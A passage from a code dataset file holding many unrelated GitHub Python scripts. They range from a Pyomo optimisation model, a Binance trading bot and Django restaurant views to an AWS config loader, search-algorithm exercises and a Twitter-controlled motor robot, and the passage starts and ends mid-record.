'')\n\t\t\tarr1.append(int(arr[i]))\n\n\tprint(quicksort(arr1))\nelse:\n\tprint([])\n","repo_name":"TamerB/practicing_algorithms","sub_path":"devide_and_conquer/quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19642141075","text":"from util.math.vector3 import Vector3\n\nTest_Verts = [\n Vector3([0, 0, 0], data_type=float),\n Vector3([0, 1, 0], data_type=float),\n Vector3([0, 1, 1], data_type=float),\n Vector3([0, 0, 1], data_type=float),\n ]\n\nTest_Tris_Index = [\n Vector3([0, 1, 2]),\n Vector3([1, 2, 3])\n]\n\nif __name__ == '__main__':\n from solo_mesh import SoloMesh\n from recast.geom import Geom\n from recast.build_config import BuildConfig\n from recast.context import Context\n context = Context()\n config = BuildConfig()\n geom = Geom(verts=Test_Verts, tris_index=Test_Tris_Index)\n soleMesh = SoloMesh(context, config, geom)\n","repo_name":"ZhengYunH/PyRecastDetour","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2996068681","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 13 20:44:26 2020\n\n@author: sergi\n\"\"\"\n\nfrom __future__ import division\nfrom pyomo.environ import *\nfrom pyomo.opt import SolverFactory\n\n\n\n# M = model\nM = ConcreteModel()\n\n# Sets and Parameters\n\n#M.valor=[2, 5, 4, 2, 6, 3, 1, 4]\n\nnumProyectos=8\n\nM.p=RangeSet(1, numProyectos)\n\nM.valor=Param(M.p, mutable=True)\n\nfor i in M.p:\n M.valor[i]=2 \n\nM.valor[1]=2\nM.valor[2]=5\nM.valor[3]=4\nM.valor[4]=2\nM.valor[5]=6\nM.valor[6]=3\nM.valor[7]=1\nM.valor[8]=4\n\n#a=M.valor.__dict__\n#b=dir(M.valor._data[1])\n#c=M.valor._data[1].value\n \n#for i in M.p:\n# print(M.valor._data[i].value)\n \n\n# Variables\nM.x = Var(M.p, domain=Binary)\n\n# Objective Function\nM.obj = Objective(expr = sum(M.x[i]*M.valor[i] for i in M.p), sense=maximize)\n\n# Constraints\n#def res1(M):\n# return \nM.res1 = Constraint(expr = sum(M.x[i] for i in M.p) == 2)\n\n# Applying the solver\nSolverFactory('glpk').solve(M)\n\nM.display()\n","repo_name":"sergiocanalesm1/Optimization_python","sub_path":"venv/ejemplos/proyectos.py","file_name":"proyectos.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72260051252","text":"from binance.exceptions import BinanceAPIException\nimport Database\nfrom binance.client import Client\nimport config\nimport time\nfrom indicator import MACDEMA\nimport setup\nimport requests\n\nintervals = (\n ('hafta', 604800), # 60 * 60 * 24 * 7\n ('gün', 86400), # 60 * 60 * 24\n ('saat', 3600), # 60 * 60\n ('dakika', 60),\n )\n\ndef display_time(seconds, granularity=3):\n result = []\n\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result[:granularity])\n\n\nconnection = Database.create_connection(\"test.db\")\n\nTIME = \"3 week ago UTC+3\"\n\ndef seller():\n print(\"Seller is working...\")\n client2 = Client(config.api_key2, config.api_secret2)\n while True:\n if Database.count_open_orders(connection) > 0:\n SYMBOLS = Database.getOpenOrder(connection)\n for x in SYMBOLS:\n try:\n time.sleep(0.3)\n klines = client2.get_historical_klines(x[1], Client.KLINE_INTERVAL_4HOUR, TIME)\n if len(klines) > 26:\n close=[]\n for entry in klines:\n close.append(float(entry[4]))\n macdBuy, macdSell, macd, signal = MACDEMA(close)\n #cciBuy, cciSell,invcci = cci(close)\n stop = close[-1] < x[2]\n sell = close[-1] >= x[3]\n \n if macdSell:\n order = (klines[-1][4],klines[-1][0],x[0])\n Database.sellOrder(connection,order)\n timeClose = display_time(int(time.time()-x[4]))\n msg = x[1] + \"\\U0001F4B0 Satış: \" + str(round(float(klines[-1][4]),8)).replace(\".\", \"\\\\.\") + Database.profitCalc(connection,x[0]) + \"\\n\" + timeClose\n setup.bot.send_message(-1001408874432, msg)\n continue\n if stop:\n order = (klines[-1][4],klines[-1][0],x[0])\n Database.sellOrder(connection,order)\n timeClose = display_time(int(time.time()-x[4]))\n msg = x[1]+ \"\\U0001F534 Stop: \" + str(round(float(klines[-1][4]),8)).replace(\".\", \"\\\\.\") + Database.profitCalc(connection,x[0]) + \"\\n\" + timeClose\n setup.bot.send_message(-1001408874432, msg)\n continue\n if sell:\n order = (klines[-1][4],klines[-1][0],x[0])\n Database.sellOrder(connection,order)\n timeClose = display_time(int(time.time()-x[4]))\n msg = x[1]+ \"\\U0001F4B8 Satış: \" + str(round(float(klines[-1][4]),8)).replace(\".\", \"\\\\.\") + Database.profitCalc(connection,x[0]) + \"\\n\" + timeClose\n setup.bot.send_message(-1001408874432, msg)\n continue\n\n except BinanceAPIException as e:\n print('Something went wrong in seller')\n time.sleep(60)\n client2 = Client(config.api_key2, config.api_secret2)\n continue\n except:\n setup.bot.send_message(923698949, 'Seller error')\n print(\"unexpected error in seller\")\n time.sleep(60)\n client2 = Client(config.api_key2, config.api_secret2)\n continue\n else:\n time.sleep(20)\n","repo_name":"0uz/Trade-bot-v2","sub_path":"seller.py","file_name":"seller.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70386650612","text":"import click\nfrom click_tools import FileUrlIterStringParamType\n\nfrom aws_utils.queue_manager import QueueManager\n\n\n@click.command()\n@click.option(\"--fifo\", is_flag=True, default=False, help=\"Use FIFO queue.\")\n@click.option(\"--avoid-duplicates / --allow-duplicates\", \"avoid_duplicates\", is_flag=True, default=True, help=\"Allow duplicates.\")\n@click.argument(\"queue_name\", type=str)\n@click.argument(\"message_file\", type=FileUrlIterStringParamType(\"r\"), default=\"-\")\ndef cli(fifo, avoid_duplicates, queue_name, message_file):\n \"\"\"Simple CLI for sending messages to an AWS SQS queue.\"\"\"\n queue_manager = QueueManager(queue_name, fifo=fifo, deduplicate=avoid_duplicates)\n\n bulk = []\n for msg in message_file:\n msg = msg.strip()\n click.echo(msg)\n\n bulk.append(msg)\n\n if len(bulk) == 10:\n queue_manager + bulk\n bulk = []\n\n if bulk:\n queue_manager + bulk\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"ralamosm/aws-utils","sub_path":"aws_utils/cli/queuer.py","file_name":"queuer.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38664276841","text":"#!/usr/bin/python3\n\nfrom modularcalculator.features.feature import Feature\nfrom modularcalculator.features.strings.strings import StringsFeature\nfrom modularcalculator.features.structure.functions import FunctionDefinition\nfrom modularcalculator.objects.exceptions import *\nfrom modularcalculator.objects.items import *\nfrom modularcalculator.objects.number import *\nfrom modularcalculator.objects.operators import OperationResult, OperatorDefinition\n\nimport re\n\n\nclass RegexFeature(Feature):\n\n def id():\n return 'strings.regex'\n\n def category():\n return 'String'\n\n def title():\n return 'Regular Expressions'\n\n def desc():\n return 'Functions for regular expressions'\n\n def dependencies():\n return ['strings.strings','structure.functions','arrays.arrays']\n\n @classmethod\n def install(cls, calculator):\n calculator.add_op(OperatorDefinition(\n 'Regular Expression',\n '=~',\n 'Return true if value matches regex',\n RegexFeature.op_regex,\n 1,\n 1,\n 'string'))\n\n calculator.add_op(OperatorDefinition(\n 'Regular Expression',\n '!~',\n 'Return true if value doesn\\'t match regex',\n RegexFeature.op_regexnot,\n 1,\n 1,\n 'string'))\n\n calculator.funcs['regexget'] = FunctionDefinition(\n 'Regular Expression',\n 'regexget',\n 'Return either all or a specific occurrence of a pattern in a string',\n ['string', 'pattern', '[group]'],\n RegexFeature.func_regexget,\n 2,\n 3)\n calculator.funcs['regexget'].add_value_restriction(0, 1, 'string')\n calculator.funcs['regexget'].add_value_restriction(2, 2, 'number')\n\n calculator.funcs['regexsplit'] = FunctionDefinition(\n 'Regular Expression',\n 'regexsplit',\n 'Split a string on a regular expression and return as an array',\n ['string', 'pattern'],\n RegexFeature.func_regexsplit,\n 2,\n 2,\n 'string')\n\n calculator.funcs['regexsub'] = FunctionDefinition(\n 'Regular Expression',\n 'regexsub',\n 'Replace all or a specific occurrence of a pattern with a replacement',\n ['string', 'pattern', 'replacement', '[group]'],\n RegexFeature.func_regexsub,\n 3,\n 4)\n calculator.funcs['regexsub'].add_value_restriction(0, 2, 'string')\n calculator.funcs['regexsub'].add_value_restriction(3, 3, 'number')\n\n calculator.funcs['regexcount'] = FunctionDefinition(\n 'Regular Expression',\n 'regexcount',\n 'Count the number of times a pattern appears in a string',\n ['string', 'pattern'],\n RegexFeature.func_regexcount,\n 2,\n 2)\n calculator.funcs['regexcount'].add_value_restriction(0, 1, 'string')\n\n def op_regex(self, vals, units, refs, flags):\n return OperationResult((re.search(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0])) is not None))\n\n def op_regexnot(self, vals, units, refs, flags):\n return OperationResult((re.search(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0])) is None))\n\n def func_regexget(self, vals, units, refs, flags):\n found = re.findall(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0]))\n if len(vals) == 3:\n group = int(vals[2]) - 1\n return OperationResult(found[int(group)])\n found = [OperandResult(f, None, None) for f in found]\n return OperationResult(found)\n\n def func_regexsplit(self, vals, units, refs, flags):\n found = re.split(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0]))\n found = [OperandResult(f, None, None) for f in found]\n return OperationResult(found)\n\n def func_regexsub(self, vals, units, refs, flags):\n if len(vals) == 4:\n return OperationResult(re.subn(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[2]), StringsFeature.string(self, vals[0]), int(vals[3]))[0])\n elif len(vals) == 3:\n return OperationResult(re.sub(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[2]), StringsFeature.string(self, vals[0])))\n else:\n raise CalculatorException(\"regexsub requires 3 or 4 arguments, found {0}\".format(len(vals)))\n\n def func_regexcount(self, vals, units, refs, flags):\n return OperationResult(Number(len(re.findall(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0])))))\n","repo_name":"JordanL2/ModularCalculator","sub_path":"modularcalculator/features/strings/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12416722893","text":"import sys\n\nfrom pprint import PrettyPrinter\n\nfrom django.contrib import messages\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom ..forms.restaurant import (\n RegisterForm,\n SendEmailForm\n)\n\nfrom core.company.models import Company\nfrom core.product.forms.product import CategoryForm, CategoryUpdateForm\nfrom core.product.models import Category\nfrom core.user.models import AdminUser\n\ndumper = PrettyPrinter(indent=4, stream=sys.stderr).pprint\n\n\ndef register(request):\n '''\n This method sends an email to register a restaurant admin in app\n '''\n template = 'restaurant/register.html'\n\n if request.method == 'POST':\n form = SendEmailForm(request.POST)\n\n if form.is_valid():\n form.send_email()\n return redirect('restaurant:form_sent')\n else:\n form = SendEmailForm\n\n return render(request, template, {'form': form})\n\n\ndef add(request):\n template = 'restaurant/add.html'\n user_email = request.user\n try:\n user = AdminUser.objects.get(email=user_email)\n except AdminUser.DoesNotExist:\n raise HttpResponseForbidden()\n \n # check if user already has a company\n try:\n company = Company.objects.get(admin=user)\n except Company.DoesNotExist:\n company = None\n\n # if user has company, redirect him/her to list_categories\n if company:\n return redirect('restaurant:list_categories')\n\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n\n if form.is_valid(user):\n return redirect('company:list')\n\n else:\n form = RegisterForm\n\n return render(request, template, {'form': form})\n\n\ndef add_category(request):\n template = 'restaurant/add_category.html'\n form = CategoryForm\n company = Company.objects.get(admin=request.user)\n\n if request.method == 'POST':\n form = CategoryForm(request.POST)\n\n if form.is_valid(company):\n return redirect('restaurant:list_categories')\n else:\n messages.error(request, 'Esa categoría ya existe')\n\n return render(request, template, {\n 'form': form, \n 'company': company\n }\n )\n\n\ndef list_categories(request):\n template = 'restaurant/list_categories.html'\n company = Company.objects.get(admin=request.user)\n categories = Category.objects.filter(\n company=company,\n is_deleted=False\n )\n return render(request, template, {\n 'categories': categories\n })\n\n\ndef edit_category(request, category_id):\n template = 'restaurant/update_category.html'\n context = {}\n category = get_object_or_404(Category, id=category_id)\n form = CategoryUpdateForm(request.POST or None, instance=category)\n\n if form.is_valid():\n form.save()\n return redirect('restaurant:list_categories')\n \n context['form'] = form\n return render(request, template, context)\n\n\ndef delete_category(request, category_id):\n category = Category.objects.get(id=category_id)\n category.is_deleted = True\n category.save()\n return redirect('restaurant:list_categories')\n\n\ndef form_sent(request, *args, **kwargs):\n template = 'restaurant/form_sent.html'\n return render(request, template)\n","repo_name":"jose-padin/takeaway","sub_path":"project/core/restaurant/views/restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16552105616","text":"from flask import Flask\nimport os\nimport requests\nimport yaml\n\n\napp = Flask(__name__)\n\n\ndef get_secret(secret_name):\n import boto3\n import json\n if 'AWS_SECRETS_REGION' in os.environ:\n region = os.environ['AWS_SECRETS_REGION']\n else:\n r = requests.get('http://169.254.169.254/latest/dynamic/instance-identity/document')\n r.raise_for_status()\n data = r.json()\n region = data['region']\n client = boto3.client(\n service_name='secretsmanager',\n region_name=region\n )\n\n # Decrypted secret using the associated KMS CMK\n # Depending on whether the secret was a string or binary, one of these fields will be populated\n get_secret_value_response = client.get_secret_value(SecretId=secret_name)\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n else:\n secret = get_secret_value_response['SecretBinary'].decode(\"utf-8\")\n return yaml.safe_load(secret)\n\n\nif 'SETTINGS' in os.environ:\n if os.path.isfile(os.environ['SETTINGS']):\n with open(os.environ['SETTINGS'], 'r') as stream:\n app.config.update(yaml.safe_load(stream))\n else:\n print('Unable to open settings file %s' % (os.environ['SETTINGS']))\n\n\n# Can be used to store entire config in AWS Secrets Manager, or can be combined\n# with file based config to provide some (but not all) settings. Can't be used\n# with the AWS Concole- the config must by uploaded using the API.\nif 'AWS_SECRETS_SETTINGS' in os.environ:\n aws_secret_name = os.environ['AWS_SECRETS_SETTINGS']\n aws_config = get_secret(aws_secret_name)\n app.config.update(aws_config)\n\n# If enabled in the existing (typically file based) settings then some specific\n# settings will be looked for in the AWS Secrets Manager. This is the only AWS\n# Console compatible option.\nif 'aws_secret_name' in app.config:\n secret_mapping = {\n 'bind_password': 'ldap',\n 'bind_dn': 'ldap',\n 'secret_key': 'general',\n 'ssh_secret': 'api',\n 'username': 'postgres',\n 'password': 'postgres',\n }\n aws_secrets = aws.get_secret(app.config['aws_secret_name'])\n for key, value in aws_secrets.items():\n if key in secret_mapping:\n app.config[secret_mapping[key]][key] = value\n\n\n# if enabled logs will be sent to LogDNA via ingest api.\nif 'LOGDNA_INGESTION_KEY' in os.environ:\n import logging\n from logdna import LogDNAHandler\n\n logdna_handler = LogDNAHandler(\n os.getenv('LOGDNA_INGESTION_KEY'),\n {'app': 'Nebula', 'include_standard_meta': True})\n log_level = logging.DEBUG if 'DEBUG' in os.environ else logging.INFO\n logdna_handler.setLevel(log_level)\n app.logger.addHandler(logdna_handler)\n app.logger.info('added logdna handler..')\n\n\nif 'general' not in app.config:\n app.config['general'] = {\n 'filecache': '/tmp/nebula',\n 'secret_key': 'changeme'\n }\n\nif 'site_name' not in app.config['general']:\n app.config['general']['site_name'] = 'nebula'\n\n\n# Initialize Celery\nfrom celery import Celery\nif 'celery' in app.config:\n celery = Celery(__name__, broker=app.config['celery']['broker'], backend=app.config['celery']['results'])\nelse:\n celery = Celery(__name__)\n\nimport nebula.nebula\n","repo_name":"tedivm/nebula","sub_path":"nebula/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"36206959321","text":"import argparse\nimport yaml\n\n\ndef initialize_config(args):\n fname = \"source/config.yaml\"\n with open(fname, 'r') as stream:\n data = yaml.load(stream)\n #data['feature_selection'] = args.feature_selection\n data['grid_search'] = args.grid_search\n #data['svm_cost'] = args.svm_cost \n #data['svm_gamma'] = args.svm_gamma\n data['csv_file'] = args.csv_file \n\n with open(fname, 'w') as yaml_file:\n yaml_file.write(yaml.dump(data, default_flow_style=False))\n\ndef args():\n '''\n Read args (path to tweets)\n '''\n parser = argparse.ArgumentParser(description ='Read args for SVM model')\n #parser.add_argument('feature_selection', help=\"which feature selection should be run\")\n parser.add_argument('grid_search', help=\"should grid search be run. If not, run SVM estimator with supplied parameters\")\n #parser.add_argument('svm_cost', help=\"svm cost\")\n #parser.add_argument('svm_gamma', help='svm gamma')\n parser.add_argument('csv_file', help='path to csv')\n\n args = parser.parse_args()\n initialize_config(args)\n \n","repo_name":"ncanterbury/directed_study","sub_path":"svm_model/source/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"890231683","text":"import unittest\n\n\ndef encode(plaintext):\n if plaintext == '':\n return plaintext\n\n ciphertext = ''\n current_char = plaintext[0]\n series_count = 0\n\n for letter in plaintext:\n if letter == current_char:\n series_count += 1\n else:\n ciphertext += compress_series(current_char, series_count)\n current_char = letter\n series_count = 1\n\n ciphertext += compress_series(current_char, series_count)\n\n return ciphertext\n\n\ndef compress_series(character, quantity):\n if quantity == 1:\n return character\n else:\n return str(quantity) + character\n\n\ndef decode(ciphertext):\n quantity = ''\n plaintext = ''\n for letter in ciphertext:\n if letter.isdigit():\n quantity += letter\n else:\n if quantity == '':\n plaintext += letter\n else:\n plaintext += int(quantity) * letter\n quantity = ''\n\n return plaintext","repo_name":"majakubo/exercism_exercises","sub_path":"python/run-length-encoding/run_length_encoding.py","file_name":"run_length_encoding.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5943305310","text":"import time\nfrom typing import List, Tuple\nfrom collections import namedtuple\nimport numpy as np\n\n\ncar_park = namedtuple('car_park', ['x', 'y', 'distance'])\n\nclass Parking:\n def minTime(self, park_raw: List[str]) -> int:\n start_time = time.time()\n \n # Build 2d-array from input\n park = self.read_input(park_raw)\n \n # Step 1: collect all the cars\n cars = []\n count_parks = 0\n \n it = np.nditer(park, flags=['multi_index'], op_flags=['readonly'])\n while not it.finished:\n # If we find car,\n if it[0] == 'C':\n cars.append(it.multi_index)\n elif it[0] == 'P':\n count_parks += 1\n it.iternext()\n \n if count_parks != len(cars):\n return -1\n \n # Step 2: for each car find possible parks\n car_parks_map = []\n for car in cars:\n car_parks = self.find_parks(park, car)\n if not len(car_parks):\n return -1\n\n car_parks_map.append(car_parks)\n \n # Step 3: run binary search to find optimal pairs\n result_time = self.get_min_time(park)\n \n eval_time = time.time() - start_time\n print(f'{eval_time} sec', end='\\n\\n')\n\n return result_time\n \n def read_input(self, park: List[str]) -> np.ndarray:\n pass\n \n def find_parks(self, park: np.ndarray, car: Tuple(int, int)) -> List[car_park]:\n \"\"\"\n Find all the parks available to given car standing on (i, j).\n \"\"\"\n pass\n \n def get_min_time(self, park: np.ndarray, car_parks_map: List[List[car_park]]) -> int:\n pass\n\n\nparking = Parking()\n\n\n# Every car just drives to the opposite parking spot.\npark = [\n \"C.....P\",\n \"C.....P\",\n \"C.....P\",\n]\nassert 6 == parking.minTime(park)\n\n# The slalom takes the car 16 units of time.\npark = [\n \"C.X.....\",\n \"..X..X..\",\n \"..X..X..\",\n \".....X.P\",\n]\nassert 16 == parking.minTime(park)\n\n# This would take 11 instead of 5 units of time if the car on the bottom drove to its nearest parking spot.\npark = [\n \"XXXXXXXXXXX\",\n \"X......XPPX\",\n \"XC...P.XPPX\",\n \"X......X..X\",\n \"X....C....X\",\n \"XXXXXXXXXXX\",\n]\nassert 5 == parking.minTime(park)\n\n# While driving, the cars can be on the same empty spot or parking spot, but they have to finish on different parking spots.\npark = [\n \".C.\",\n \"...\",\n \"C.C\",\n \"X.X\",\n \"PPP\",\n]\nassert 4 == parking.minTime(park)\n\n# There are not enough parking spots for all the cars.\npark = [\n \"CCCCC\",\n \".....\",\n \"PXPXP\",\n]\nassert -1 == parking.minTime(park)\n\n# The car can't reach the parking spot.\npark = [\n \"..X..\",\n \"C.X.P\",\n \"..X..\",\n]\nassert -1 == parking.minTime(park)\n","repo_name":"gugaevkirill/algorithms","sub_path":"Optimal Pair Matching/SRM 236 Parking/parking.py","file_name":"parking.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20736290325","text":"from simpleai.search import (\n SearchProblem,\n breadth_first,\n depth_first,\n uniform_cost,\n greedy,\n astar\n)\nfrom simpleai.search.viewers import WebViewer, BaseViewer, ConsoleViewer\n\nINITIAL_STATE = (0,0,0)\nGOAL_STATE = (5,1,8)\n\nclass AlienStarshipProblem(SearchProblem):\n def is_goal(self, state):\n return state == GOAL_STATE\n \n def actions(self, state):\n possible_actions = []\n\n for x in range(0,4):\n value1, value2, value3 = state\n aux = 0\n\n if x == 0: #red\n value1 += 3\n if (0 <= value1 <= 9):\n possible_actions.append(('red',value1,-1))\n elif x == 1: #green\n value1 -= 2\n if (0 <= value1 <= 9):\n possible_actions.append(('green',value1,-1))\n elif x == 2: #yellow\n aux = value1\n value1 = value2\n value2 = aux\n possible_actions.append(('yellow',value1,value2))\n elif x == 3: #cyan\n aux = value2\n value2 = value3\n value3 = aux\n possible_actions.append(('cyan',value2,value3))\n\n return possible_actions\n\n def result(self, state, action):\n button, new_value1, new_value2 = action\n state = list(state)\n if button == 'red':\n state[0] = new_value1\n elif button == 'green':\n state[0] = new_value1\n elif button == 'yellow':\n state[0] = new_value1\n state[1] = new_value2\n elif button == 'cyan':\n state[1] = new_value1\n state[2] = new_value2\n state = tuple(state)\n #print(state)\n return state\n\n def cost(self, state, action, state2):\n return 1\n\n def heuristic(self, state):\n # Sin heuristica\n # return super().heuristic(state)\n # {'max_fringe_size': 126, 'visited_nodes': 908, 'iterations': 908}\n\n # Heuristica: cantidad de casillas que faltan para llegar al goal\n # {'max_fringe_size': 146, 'visited_nodes': 724, 'iterations': 724}\n value1, value2, value3 = state\n goal1, goal2, goal3 = GOAL_STATE\n x = 0\n if value1 != goal1:\n x += 1\n if value2 != goal2:\n x += 1\n if value3 != goal3:\n x += 1\n \n return x\n\nMETHODS = (\n #breadth_first,\n depth_first,\n #uniform_cost,\n greedy,\n astar\n) \n \nfor search_algorithm in METHODS:\n print()\n print('=' * 50)\n print(\"Running:\", search_algorithm)\n visor = BaseViewer()\n problem = AlienStarshipProblem(INITIAL_STATE)\n result = search_algorithm(problem, graph_search = True, viewer = visor)\n print ('Final State:', result.state)\n print('=' * 50)\n print(' - Statistics:')\n print(' - Amount of actions until goal:', len(result.path()))\n print(' - Raw data:', visor.stats)\n '''\n for action, state in result.path():\n print(\" - Action:\", action)\n print(\" - Resulting State:\", state)\n '''","repo_name":"Ganymede23/UCSE-Practica-IA-2021","sub_path":"search_alien_starship.py","file_name":"search_alien_starship.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6037428413","text":"from time import sleep\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.support.select import Select\r\n\r\n\r\nclass AutomateCourse:\r\n def __init__(self):\r\n chrome_options = Options()\r\n chrome_options.add_argument('--lang=pt-BR')\r\n self.driver = webdriver.Chrome(executable_path=\"chromedriver.exe\", options=chrome_options)\r\n\r\n\r\n def Start(self):\r\n self.driver.get(\"https://cursoautomacao.netlify.app/\")\r\n dropdown = self.driver.find_element_by_xpath(\"//select[@id='paisselect']\")\r\n options = Select(dropdown)\r\n options.select_by_index(2)\r\n sleep(3)\r\n options.select_by_index(1)\r\n sleep(3)\r\n options.select_by_index(0)\r\n\r\n # options.select_by_value(\"brasil\", \"estadosunidos\", \"canada\")\r\n # options.select_by_visible_text(\"Brasil\", \"Estados Unidos\", \"Canada\")\r\n\r\n\r\ncourse = AutomateCourse()\r\ncourse.Start()","repo_name":"franssa01/Courses","sub_path":"DevAprender/Mestre da Automação/02 Mestre da Web/Classes/CL012 Interecting with dropdown/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42033117258","text":"#!/usr/bin/python\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor\n\nimport time\nimport atexit\nimport tweepy\n\n\ndef tweetBack(status, api, direction):\n\t\n\tposter = status[0].user\n\tpost = \"\"\n\tif direction == \"\":\n\t\tpost = \"@\" + poster.screen_name + \" You know I don't speak Spanish!\"\n\t\n\tif direction == \"r\":\n\t\tpost = \"@\" + poster.screen_name + \" you spin me right round, baby, right round!\"\n\tif direction == \"l\":\n\t\tpost = \"@\" + poster.screen_name + \" To the left, to the left, everything you own in a box to the left!\"\n\n\tif direction == \"f\":\n\t\tpost = \"@\" + poster.screen_name + \" Choo Choo Muttthafuckkah!\"\n\n\tif direction == \"b\":\n\t\tpost = \"@\" + poster.screen_name + \" Who is you playin' wit? back that azz up!\"\n\n\tprint(post)\n\ttry:\n\t\tapi.update_status(post)\n\t\n\texcept:\n\t\tprint(\"don't tweet twice\")\n\n\treturn\n\ndef mineTweetText(rawText):\n\t#build a corpus\n\tforwardWords = {\"forward\", \"ahead\", \"straight\", \"go\", \"onward\"}\n\tbackwardWords = {\"backward\", \"back\", \"backwards\", \"reverse\", \"away\", \"retreat\"} \t\n\tleftWords = {\"counterclockwise\", \"left\", \"port\"}\n\trightWords = {\"clockwise\", \"right\", \"starboard\"} \n\n\t\n\t\n\t#variables for command to robot\n\tdirection = \"\"\n\t\n\t#Mine Tweet for Direction\n\tfor word in forwardWords:\n\t\tif word in tweetText:\n\t\t\tdirection =\"f\"\n\tfor word in backwardWords:\n\t\tif word in tweetText:\n\t\t\tdirection = \"b\"\n\tfor word in rightWords:\n\t\tif word in tweetText:\n\t\t\tdirection = \"r\"\n\tfor word in leftWords:\n\t\tif word in tweetText:\n\t\t\tdirection = \"l\"\n\n\treturn direction\n\t\t\n\ndef twitterConnect():\n\tkey = \"Your Key\"\n\tsecret = \"Your Secret\"\n\taccessTok = \"Your Access Token\"\n\taccessSec = \"Your access secret\"\n\townerID = \"Your owner ID\"\n\towner = \"RealShittyRobot\"\t\n\t\n\tauth = tweepy.OAuthHandler(key, secret)\n\tauth.set_access_token(accessTok, accessSec)\n\tapi = tweepy.API(auth)\n\t\n\treturn api\n\ndef readTwitter(api):\n\n\tsearch_text = \"@RealShittyRobot\"\n\n\tstatus = api.search(search_text, rpp = 1)\n\n\treturn status \n\ndef makeMove(mh, direction, speed, moveTime):\n speed = int(speed)\n moveTime = float(moveTime)\n print(\"direction\", direction, \"speed \", speed, \"move time\", moveTime)\n frontLeft = mh.getMotor(1)\n frontRight = mh.getMotor(2)\n rearRight = mh.getMotor(3)\n rearLeft = mh.getMotor(4)\n \n \n if direction == \"f\":\n frontRight.run(Adafruit_MotorHAT.FORWARD)\n frontLeft.run(Adafruit_MotorHAT.FORWARD)\n rearRight.run(Adafruit_MotorHAT.FORWARD)\n rearLeft.run(Adafruit_MotorHAT.FORWARD)\n\n if direction == \"b\":\n frontRight.run(Adafruit_MotorHAT.BACKWARD)\n frontLeft.run(Adafruit_MotorHAT.BACKWARD)\n rearRight.run(Adafruit_MotorHAT.BACKWARD)\n rearLeft.run(Adafruit_MotorHAT.BACKWARD)\n\n if direction == \"l\":\n frontRight.run(Adafruit_MotorHAT.FORWARD)\n frontLeft.run(Adafruit_MotorHAT.BACKWARD)\n rearRight.run(Adafruit_MotorHAT.FORWARD)\n rearLeft.run(Adafruit_MotorHAT.BACKWARD)\n\n if direction == \"r\":\n frontRight.run(Adafruit_MotorHAT.BACKWARD)\n frontLeft.run(Adafruit_MotorHAT.FORWARD)\n rearRight.run(Adafruit_MotorHAT.BACKWARD)\n rearLeft.run(Adafruit_MotorHAT.FORWARD)\n\n frontLeft.setSpeed(speed)\n frontRight.setSpeed(speed)\n rearRight.setSpeed(speed)\n rearLeft.setSpeed(speed)\n\n time.sleep(moveTime)\n turnOffMotors(mh)\n return\n\n\n# recommended for auto-disabling motors on shutdown!\ndef turnOffMotors(mh):\n mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)\n mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)\n mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)\n mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)\n\ndef convertSpeed(speed):\n speed = float(speed)\n speed = speed / 100 * 255.0\n return int(speed)\n\ndef moveTheRobot(direction, moveSpeed, moveTime):\n runTime = moveTime\n speed = moveSpeed\n\n #while True:\n mh = Adafruit_MotorHAT(addr=0x60)\n\t\n # direction = raw_input(\"Select Direction f, b, l, r or q to 